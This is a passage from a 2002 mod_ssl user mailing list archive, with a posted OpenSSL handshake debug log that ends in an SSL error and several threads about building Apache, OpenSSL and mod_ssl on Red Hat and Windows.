| 0000: 01&=
nbsp;           &nbs=
p;            &=
nbsp;           &nbs=
p;         .    =
;            |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 5/5 bytes from BIO#301A2CC8 [mem: 3=
01AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 00 00 38          &nbs=
p;            &=
nbsp;           ....8&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 56/56 bytes from BIO#301A2CC8 [mem:=
 301AC72D] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 13 =
3a af b4 52 6a a1 f9-40 8b 29 2b 03 3f 36 f8  .:..Rj..@.)+.?6. |



| 0010: bc =
e0 2c 98 c1 ba 88 d8-db ff 43 5d 01 af 36 47  ..,.......C]..6G |



| 0020: 76 =
81 2d 1b b1 a9 b1 75-fb 1c b6 49 70 04 d5 30  v.-....u...Ip..0 |



| 0030: da =
fa cd a0 82 98 12 ae-         =
            &nb=
sp;   ........         |<=
/FONT>



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 read finished A



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Handshake: done





###########=
##################FROM a JAVA client ######################################=
#



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Handshake: start



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: before/accept initialization



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 11/11 bytes from BIO#301A2CC8 [mem:=
 301AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01 00 5d 01 00 00-59 03 01       &nbs=
p;         ....]...Y..  &=
nbsp;   |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 87/87 bytes from BIO#301A2CC8 [mem:=
 301AC733] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 3d =
11 bd 7e 02 8f 4a 6d-a0 ca 8d 96 f8 45 bc b1  =3D..~..Jm.....E.. |



| 0010: 68 =
35 40 f5 de 70 1a 2b-b2 e4 bc 0a 00 90 d3 94  h5@..p.+........ |



| 0020: 20 =
85 e4 ff 82 ea 00 fb-fb 86 66 94 47 78 a4 98   .........f.Gx.. |



| 0030: 5d d4 =
5b e2 85 a1 b8 3a-ce 7c 0a 3e 25 85 27 92  ].[....:.|.>%.'. |



| 0040: 07 00 =
12 00 04 00 05 00-09 00 0a 00 03 00 08 00  ................ |



| 0050: 06 00 =
01 00 02 01          &nbs=
p;            &=
nbsp;        ......   &nb=
sp;       |



| 0057 - <S=
PACES/NULS>



+---------------------------------=
----------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [trace] Inter-Process Session Cache: request=3DGET status=
=3DMISSED id=3D85E4FF82EA00FBFB8666944778A4985DD45BE285A1B83ACE7C0A3E258527=
9207 (session renewal)



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read client hello A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write server hello A<=
/SPAN>



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write certificate A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write server done A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 flush data



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from BIO#301A2CC8 [mem: 3=
01AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01 00 46          &nbs=
p;            &=
nbsp;           ....F&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 70/70 bytes from BIO#301A2CC8 [mem:=
 301AC72D] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 10 =
00 00 42 00 40 36 5b-7b db 01 6a c6 dc 3f 3d  ...B.@6[{..j..?=3D |



| 0010: f8 =
a4 36 c4 1a 9a 48 91-da 6a 93 88 4f 8f 56 17  ..6...H..j..O.V. |



| 0020: d0 =
c1 2e ec 37 72 d1 af-2c 04 2b a0 e6 01 41 fd  ....7r..,.+...A. |



| 0030: d8 =
16 f5 4e e5 fc 47 66-01 61 2c 8e 87 ac 9f bb  ...N..Gf.a,..... |



| 0040: 38 =
fb 4a b2 02 53          &=
nbsp;           &nbs=
p;         8.J..S   =
        |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read client key exchange A



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from BIO#301A2CC8 [mem: 3=
01AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 14 =
03 01 00 01          &nbs=
p;            &=
nbsp;           .....&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 1/1 bytes from BIO#301A2CC8 [mem: 3=
01AC72D] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 01&=
nbsp;           &nbs=
p;            &=
nbsp;           &nbs=
p;         .    =
;            |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from BIO#301A2CC8 [mem: 3=
01AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01           &nbs=
p;            &=
nbsp;           &nbs=
p;    ...        &nb=
sp;     |



| 0005 - &l=
t;SPACES/NULS>



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [debug] OpenSSL: read 32/32 bytes from BIO#301A2CC8 [mem:=
 301AC72D] (BIO dump follows)



+------------------------------------=
-------------------------------------+



| 0000: b7 af =
39 95 65 14 be c0-55 e8 df 25 b9 fe 62 e2  ..9.e...U..%..b. |



| 0010: 80 eb 47 74 8b 74 cd 09-3d=
 cf 1f a3 a7 85 2d 99  ..Gt.t..=3D.....-. |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read finished A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write finished A



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 flush data



[20/Jun/200=
2 13:30:38 10436] [trace] Inter-Process Session Cache: request=3DSET status=
=3DOK id=3DBAF123503A2978BE228BE6C2A7BE69CF58779AF1D98B1432175E0C745D6E3623=
 timeout=3D300s (session caching)



[20/Jun/200=
2 13:30:38 10436] [trace] OpenSSL: Handshake: done



###########=
#####FROM a CGI client ##################################################



[20/Jun/200=
2 11:05:50 13532] [trace] OpenSSL: Handshake: start



[20/Jun/200=
2 11:05:50 13532] [trace] OpenSSL: Loop: before/accept initialization



[20/Jun/200=
2 11:05:50 13532] [debug] OpenSSL: read 11/11 bytes from BIO#3017F2A8 [mem:=
 301C7EF8] (BIO dump follows)



+---------------------------------------------------------------=
----------+



| 0000: 80 6b =
01 03 01 00 42          &=
nbsp;           &nbs=
p;      .k....B      =
;    |



| 000b - <S=
PACES/NULS>



+---------------------------------=
----------------------------------------+



[20/Jun/200=
2 11:05:50 13532] [debug] OpenSSL: read 98/98 bytes from BIO#3017F2A8 [mem:=
 301C7F03] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 00 =
00 16 00 00 13 00 00-0a 00 00 07 00 00 05 00  ................ |



| 0010: 00 =
04 00 00 15 00 00 12-00 00 09 07 00 c0 05 00  ................ |



| 0020: 80 =
03 00 80 01 00 80 08-00 80 06 00 40 00 00 14  ............@... |



| 0030: 00 =
00 11 00 00 08 00 00-06 00 00 03 04 00 80 02  ................ |



| 0040: 00 =
80 6d a5 18 58 b9 cd-c8 bd 02 1d 7e 20 20 6c  ..m..X......~  l |<=
/FONT>



| 0050: 46 =
2d ec 6b 71 ad 31 5a-fe f6 d9 19 8f ba 84 f3  F-.kq.1Z........ |



| 0060: 8b =
9c            &=
nbsp;           &nbs=
p;            &=
nbsp;      ..      &=
nbsp;        |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 read client hello A



[20/Jun/200=
2 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 write server hello A<=
/SPAN>



[20/Jun/200=
2 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 write certificate A



[20/Jun/200=
2 11:05:50 13532] [trace] handing out temporary 1024 bit DH key



[20/Jun/200=
2 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 write key exchange A<=
/SPAN>



[20/Jun/200=
2 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 write certificate request A<=
/FONT>



[20/Jun/200=
2 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 flush data



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from BIO#3017F2A8 [mem: 3=
01C7EF8] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01 00 07          &nbs=
p;            &=
nbsp;           .....&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 7/7 bytes from BIO#3017F2A8 [mem: 3=
01C7EFD] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 0b =
00 00 03           &=
nbsp;           &nbs=
p;            &=
nbsp; ....           =
;  |



| 0007 - &l=
t;SPACES/NULS>



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [trace] OpenSSL: Loop: SSLv3 read client certificate A



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from BIO#3017F2A8 [mem: 3=
01C7EF8] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01 00 86          &nbs=
p;            &=
nbsp;           .....&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 134/134 bytes from BIO#3017F2A8 [me=
m: 301C7EFD] (BIO dump follows)



+------------------------------------=
-------------------------------------+



| 0000: 10 00 =
00 82 00 80 86 ab-42 68 68 eb 1d b1 7c 97  ........Bhh...|. |



| 0010: 3d 0d =
da 91 a4 3d 5f f6-c7 6f 07 a9 9b 41 98 c4  =3D....=3D_..o...A.. |



| 0020: 20 88 =
89 99 32 4c 52 92-e1 9c 35 1b 19 84 18 b2   ...2LR...5..... |



| 0030: 7d =
ac b0 d2 08 05 51 16-bf 9d d8 d2 26 15 dc a3  }.....Q.....&... |



| 0040: a3 =
f8 ae fc fc 2b 9f 57-a2 6d f8 46 a3 08 4a 49  .....+.W.m.F..JI |



| 0050: dd =
8d cd b6 2f a3 49 13-8b 11 86 d0 49 10 05 b6  ..../.I.....I... |



| 0060: 44 =
09 9f c0 1d 0d db 96-34 e2 f1 34 a3 e6 7a f5  D.......4..4..z. |



| 0070: 8e =
a7 31 60 62 0a 87 51-f4 87 a8 69 3c 2b 65 b8  ..1`b..Q...i<+e. |



| 0080: 9f =
bc 6e 16 2d f7          &=
nbsp;           &nbs=
p;         ..n.-.   =
        |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [trace] OpenSSL: Loop: SSLv3 read client key exchange A



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from BIO#3017F2A8 [mem: 3=
01C7EF8] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 14 =
03 01 00 01          &nbs=
p;            &=
nbsp;           .....&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 1/1 bytes from BIO#3017F2A8 [mem: 3=
01C7EFD] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 01&=
nbsp;           &nbs=
p;            &=
nbsp;           &nbs=
p;         .    =
;            |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from BIO#3017F2A8 [mem: 3=
01C7EF8] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 16 =
03 01 00 28          &nbs=
p;            &=
nbsp;           ....(&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [debug] OpenSSL: read 40/40 bytes from BIO#3017F2A8 [mem:=
 301C7EFD] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: db =
7a 62 c2 e4 f9 08 b7-de 2a a7 c9 65 16 f0 97  .zb......*..e... |



| 0010: 66 =
9f 32 fc 10 ea 0d 02-49 9f 26 12 fe 2c 83 d1  f.2.....I.&..,.. |



| 0020: ef =
66 40 32 5f cd d5 61-         =
            &nb=
sp;   .f@2_..a         |<=
/FONT>



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 11:05:52 13532] [trace] OpenSSL: Write: SSLv3 read certificate verify A



[20/Jun/200=
2 11:05:52 13532] [trace] OpenSSL: Exit: error in SSLv3 read certificate ve=
rify A



[20/Jun/200=
2 11:05:52 13532] [trace] OpenSSL: Exit: error in SSLv3 read certificate ve=
rify A



[20/Jun/200=
2 11:05:52 13532] [error] SSL handshake failed (server www.tst.creditagricol.fr:443<=
/FONT>, c=
lient 10.11=
7.5.4) (OpenSSL library error follows)



[20/Jun/200=
2 11:05:52 13532] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_REC=
ORD:decryption failed or bad record mac



###########=
###########################################################################=
##########



Thanks in a=
dvance for your help.






Cordialement,=




 



Pierre HURET



Mail:=
 <=
/SPAN>pierre.huret@ca-sctbrunoy.fr<=
/U>=













---------------------------------------------------------------------



Ce message et toutes les pieces jointes sont a l'intention exclusive de ses=
 destinataires et sont confidentiels. Si vous recevez ce message par erreur=
, merci de le detruire et d'en avertir immediatement l'expediteur.

Toute utilisation de ce message non conforme a sa destination, toute diffus=
ion ou toute duplication, totale ou partielle, est interdite, sauf autorisa=
tion prealable.

L'internet ne permettant pas d'assurer l'integrite de ce message, nous decl=
inons toute responsabilite au titre de ce message, dans l'hypothese ou il a=
urait ete modifie.



               -------------------



This message and any attachements are intended solely for the addressees an=
d are confidential. If you receive this message by error, please delete it =
and immediately notify the sender.

Any use not in accord with its purpose, any dissemination or disclosure, ei=
ther whole or partial, is prohibited except previous approval.

The internet can not guarantee the integrity of this message. We will  not =
therefore be liable for the message if modified.



---------------------------------------------------------------------



------_=_NextPart_001_01C2185D.18DF6E1A--

------=_NextPartTM-000-20d68d7b-d1ab-4724-b061-d7c2bd768b9f--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:40:58 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA03688; Thu, 20 Jun 2002 22:39:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA03442; Thu, 20 Jun 2002 22:37:29 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA16904
	for ; Thu, 20 Jun 2002 16:38:13 -0400
Date: Thu, 20 Jun 2002 16:38:13 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: SSL for apache 2.0.39
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002, Jess Williams wrote:

> I downloaded the binary for RedHat for 2.0.39 and installed it on RedHat 
> 7.1.  For some reason apache will not start listening on 443!  Its driving 
> me crazy.  It works fine for port 80 just not 443.
> 
> Do I need to download something in addition?  I am trying to use
> ./apachectl startssl to start it up
> 

Don't be so lazy   dump the rmp's, meaning uninstall em and grab
the apache source and openssl source and hand compile, all should function
then.

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:56:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05665; Thu, 20 Jun 2002 22:55:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id WAA05598; Thu, 20 Jun 2002 22:54:52 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP
	id 34F482D06; Thu, 20 Jun 2002 22:54:51 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id A5A4E2D05; Thu, 20 Jun 2002 22:54:48 +0200 (METDST)
Date: Thu, 20 Jun 2002 22:54:48 +0200
From: Lutz Jaenicke 
To: openssl-users@openssl.org, modssl-users@modssl.org
Subject: Re: Fwd: openssl-0.9.7-beta1 testing
Message-ID: <20020620205448.GA12661@serv01.aet.tu-cottbus.de>
Mail-Followup-To: openssl-users@openssl.org, modssl-users@modssl.org
References: <5.1.1.1.2.20020619132401.05956ad8@asgaard.wan.cwomnes.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5.1.1.1.2.20020619132401.05956ad8@asgaard.wan.cwomnes.net>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jun 19, 2002 at 01:25:15PM -0500, Steve Romero wrote:
> I see that this never went out.

> >+ openssl-0.9.7-beta1
> >
> >When compiling openssl I get:
> >
> >evp_test.c: In function `main':
> >evp_test.o(.text+0x11bc): undefined reference to `strsep'

Has been corrected in OpenSSL-0.9.7-beta2.

> >+ mod_ssl-2.8.8-1.3.24

> >ssl_engine_vars.c:410: `NID_uniqueIdentifier' undeclared here (not in a 
> >function)

Has been adjusted in mod_ssl-2.8.9-1.3.26

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 23:21:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA07638; Thu, 20 Jun 2002 23:20:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id XAA07580; Thu, 20 Jun 2002 23:19:35 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g5KLJUh06529
	for ; Thu, 20 Jun 2002 17:19:30 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 17:13:02 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: Trouble building on Win32
Date: Thu, 20 Jun 2002 17:13:01 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I'm trying to bld 2.8.9-1.3.26 on Windows 2000 server with VC++ 7.0
installed. I'm running into the following issues:

1) When patching the sources I get the following:

|+--------------------------------------------------------------------------
-
|| First patch APACI's configuration script to pass a `ssl' flag
|| to the Makefile.tmpl file which indicated whether mod_ssl is
|| activated or not.  Second we add support for the SSL_BASE and
|| RSA_BASE variables. Third we provide the configuration
|| adjustments of the HTTPS port (443) similar to what is
|| already done by APACI for the HTTP port (80).
|+--------------------------------------------------------------------------
-
|Index: configure
|--- configure  19 Jun 2002 07:20:10 -0000      1.1.1.14
|+++ configure  19 Jun 2002 07:29:07 -0000      1.26
--------------------------
File to patch:

If I ignore that and skip that patch I get another issue here:

|+--------------------------------------------------------------------------
-
|| Here we first incorporate support for the `make certificate'
|| procedure and second support for the `make install' procedure
|| where SSL directives in the configuration files are now also
|| adjusted and SSL certs/keys and support programs are now
|| additionally installed.
|+--------------------------------------------------------------------------
-
|Index: Makefile.tmpl
|--- Makefile.tmpl      27 Mar 2002 15:22:49 -0000      1.1.1.12
|+++ Makefile.tmpl      27 Mar 2002 15:30:01 -0000      1.44
--------------------------
File to patch:

If I skip/ignore that I get another one:

|
|+--------------------------------------------------------------------------
-
|| Add additional SSL configuration directives which provide a
|| robust default configuration: virtual server on port 443
|| which speaks SSL.
|+--------------------------------------------------------------------------
-
|Index: conf/httpd.conf-dist
|--- conf/httpd.conf-dist       27 Mar 2002 15:22:49 -0000      1.1.1.14
|+++ conf/httpd.conf-dist       27 Mar 2002 15:30:01 -0000      1.65
--------------------------
File to patch:

For this one I directed it to patch conf/httpd.conf-dist-win and that seemed
to work ok.

After this the rest of the patch process completes and I am directed to
build Apache. 

While building apache I get the following error:


        cl.exe /nologo /c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS
/DSHARED_M
ODULE /DEAPI /DMOD_SSL=208109 /DMOD_SSL_VERSION=\"2.8.9\" /I..\..\include
/I..\.
.\os\win32 /Ic:\silverback\openssl\include mod_ssl.c
mod_ssl.c
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(37) : error C2061: syntax error : identifier 'HRESULT'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(37) : error C2059: syntax error : ';'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(243) : error C2061: syntax error : identifier 'HCRYPTPROV'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(243) : error C2059: syntax error : ';'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(244) : error C2061: syntax error : identifier 'HCRYPTKEY'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h
(244) : error C2059: syntax error : ';'
c:\Program Files\Microsoft Visual Studio
.NET\Vc7\PlatformSDK\Include\WinCrypt.h

Any thoughts on these issues? Thanks,

-Noah
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 23:30:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA08203; Thu, 20 Jun 2002 23:29:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id XAA08136; Thu, 20 Jun 2002 23:28:25 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 20 Jun 2002 23:31:02 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 20 Jun 2002 21:28:22 UT
Date: Thu, 20 Jun 2002 17:28:59 -0400
MIME-Version: 1.0
Subject: Re: Trouble building on Win32
Message-ID: <3D1210DB.22346.20671DE8@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 20 Jun 2002 21:31:02.0309 (UTC) FILETIME=[C6C05550:01C218A1]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is your win32 build environment set on the command line?
It looks like something is wrong with your include path.
run set, and see whether or not the correct value for include shows up.
> 
> I'm trying to bld 2.8.9-1.3.26 on Windows 2000 server with VC++ 7.0
> installed. I'm running into the following issues:
> 
> 1) When patching the sources I get the following:
> 
> |+--------------------------------------------------------------------
> ------ - || First patch APACI's configuration script to pass a `ssl'
> flag || to the Makefile.tmpl file which indicated whether mod_ssl is
> || activated or not.  Second we add support for the SSL_BASE and ||
> RSA_BASE variables. Third we provide the configuration || adjustments
> of the HTTPS port (443) similar to what is || already done by APACI
> for the HTTP port (80).
> |+--------------------------------------------------------------------
> ------ - |Index: configure |--- configure  19 Jun 2002 07:20:10 -0000 
>     1.1.1.14 |+++ configure  19 Jun 2002 07:29:07 -0000      1.26
> -------------------------- File to patch:
> 
> If I ignore that and skip that patch I get another issue here:
> 
> |+--------------------------------------------------------------------
> ------ - || Here we first incorporate support for the `make
> certificate' || procedure and second support for the `make install'
> procedure || where SSL directives in the configuration files are now
> also || adjusted and SSL certs/keys and support programs are now ||
> additionally installed.
> |+--------------------------------------------------------------------
> ------ - |Index: Makefile.tmpl |--- Makefile.tmpl      27 Mar 2002
> 15:22:49 -0000      1.1.1.12 |+++ Makefile.tmpl      27 Mar 2002
> 15:30:01 -0000      1.44 -------------------------- File to patch:
> 
> If I skip/ignore that I get another one:
> 
> |
> |+--------------------------------------------------------------------
> ------ - || Add additional SSL configuration directives which provide
> a || robust default configuration: virtual server on port 443 || which
> speaks SSL.
> |+--------------------------------------------------------------------
> ------ - |Index: conf/httpd.conf-dist |--- conf/httpd.conf-dist      
> 27 Mar 2002 15:22:49 -0000      1.1.1.14 |+++ conf/httpd.conf-dist    
>   27 Mar 2002 15:30:01 -0000      1.65 -------------------------- File
> to patch:
> 
> For this one I directed it to patch conf/httpd.conf-dist-win and that
> seemed to work ok.
> 
> After this the rest of the patch process completes and I am directed
> to build Apache. 
> 
> While building apache I get the following error:
> 
> 
>         cl.exe /nologo /c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS
> /DSHARED_M ODULE /DEAPI /DMOD_SSL=208109 /DMOD_SSL_VERSION=\"2.8.9\"
> /I..\..\include /I..\. .\os\win32 /Ic:\silverback\openssl\include
> mod_ssl.c mod_ssl.c c:\Program Files\Microsoft Visual Studio
> .NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2061: syntax
> error : identifier 'HRESULT' c:\Program Files\Microsoft Visual Studio
> .NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2059: syntax
> error : ';' c:\Program Files\Microsoft Visual Studio
> .NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2061: syntax
> error : identifier 'HCRYPTPROV' c:\Program Files\Microsoft Visual
> Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2059:
> syntax error : ';' c:\Program Files\Microsoft Visual Studio
> .NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2061: syntax
> error : identifier 'HCRYPTKEY' c:\Program Files\Microsoft Visual
> Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2059:
> syntax error : ';' c:\Program Files\Microsoft Visual Studio
> .NET\Vc7\PlatformSDK\Include\WinCrypt.h
> 
> Any thoughts on these issues? Thanks,
> 
> -Noah
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 00:08:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA10789; Fri, 21 Jun 2002 00:08:04 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from astro.umn.edu id AAA10678; Fri, 21 Jun 2002 00:06:47 +0200 (MET DST)
From: gkuchta@astro.umn.edu
Received: (qmail 4956 invoked from network); 20 Jun 2002 22:06:41 -0000
Received: from unknown (128.101.221.20)
